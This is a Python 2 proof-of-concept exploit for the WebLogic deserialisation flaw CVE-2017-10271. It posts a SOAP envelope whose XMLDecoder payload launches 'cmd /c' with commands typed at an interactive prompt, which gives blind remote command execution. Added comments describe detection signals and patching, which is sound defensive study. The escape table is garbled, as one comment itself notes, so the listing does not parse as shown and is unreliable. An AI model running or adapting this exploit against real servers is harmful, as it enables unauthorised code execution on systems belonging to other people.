# Proof-of-concept client for CVE-2017-10271 (per the banner printed below).
# It POSTs a SOAP envelope to the WebLogic WLS-WSAT endpoint
# /wls-wsat/CoordinatorPortType; the envelope's WorkContext header carries a
# java.beans.XMLDecoder document.  Python 2 syntax (print statement, raw_input).
#
# Defender notes:
#   * Network signal: a text/xml POST to /wls-wsat/CoordinatorPortType whose
#     body names java.beans.XMLDecoder or java.lang.ProcessBuilder inside
#     <work:WorkContext>.
#   * Host signal: the payload asks for "cmd /c <command>", so on a vulnerable
#     Windows host the visible effect would be a command shell started as a
#     child of the application server's Java process.
#   * Mitigation: apply the vendor fix (Oracle's October 2017 Critical Patch
#     Update) and keep /wls-wsat/* unreachable from untrusted networks; remove
#     the component where it is not needed.
import requests
import sys

# Target base URL comes straight from the first command-line argument; it is
# not validated before the endpoint path is appended.
url_in = sys.argv[1]
payload_url = url_in + "/wls-wsat/CoordinatorPortType"
payload_header = {'content-type': 'text/xml'}


# Build the SOAP request body for one command string.
#   command_in: text typed at the prompt; each character is looked up in
#               html_escape_table and the result is wrapped in <string>.
#   Returns the complete envelope as a single str.
def payload_command (command_in):
    # NOTE(review): as shown, every replacement equals its key and the '"'
    # entry is not a valid string literal -- the values look as if they were
    # entity-decoded when the page was extracted, so this listing does not
    # parse as written.
    html_escape_table = {
        "&": "&",
        '"': """,
        "'": "'",
        ">": ">",
        "<": "<",
    }
    command_filtered = "<string>"+"".join(html_escape_table.get(c, c) for c in command_in)+"</string>"
    # The envelope is one concatenated literal.  Its WorkContext header embeds
    # an XMLDecoder document that fills a 3-element String array ("cmd", "/c",
    # <command>) for java.lang.ProcessBuilder and then invokes start().  These
    # fixed strings are what request-inspection rules can match on.
    payload_1 = "<soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\"> \n" \
                " <soapenv:Header> " \
                " <work:WorkContext xmlns:work=\"http://bea.com/2004/06/soap/workarea/\"> \n" \
                " <java version=\"1.8.0_151\" class=\"java.beans.XMLDecoder\"> \n" \
                " <void class=\"java.lang.ProcessBuilder\"> \n" \
                "<array class=\"java.lang.String\" length=\"3\">" \
                "<void index = \"0\"> " \
                "<string>cmd</string> " \
                "</void>" \
                "<void index = \"1\"> " \
                "<string>/c</string>" \
                "</void>" \
                "<void index = \"2\"> " \
                + command_filtered + \
                "</void>" \
                "</array>" \
                "<void method=\"start\"/>" \
                "</void>" \
                "</java>" \
                "</work:WorkContext>" \
                " </soapenv:Header>" \
                " <soapenv:Body/>" \
                "</soapenv:Envelope>"
    return payload_1


# Send one request and print a coarse outcome.
# The response body is never read (the banner calls the technique "blind").
# HTTP 500 is the only status reported as success; any other status prints the
# failure text.  No timeout is passed to requests.post.
def do_post(command_in):
    result = requests.post(payload_url, payload_command(command_in ),headers = payload_header)
    if result.status_code == 500:
        print "Command Executed \n"
    else:
        print "Something Went Wrong \n"


# Banner, then an interactive loop: each line read is sent as its own POST
# until the literal "exit" is entered.
print "***************************************************** \n" \
      "**************** Coded By 1337g****************** \n" \
      "*CVE-2017-10271 Blind Remote Command Execute EXP* \n" \
      "***************************************************** \n"
while 1:
    command_in = raw_input("Eneter your command here: ")
    if command_in == "exit" :
        exit(0)
    do_post(command_in)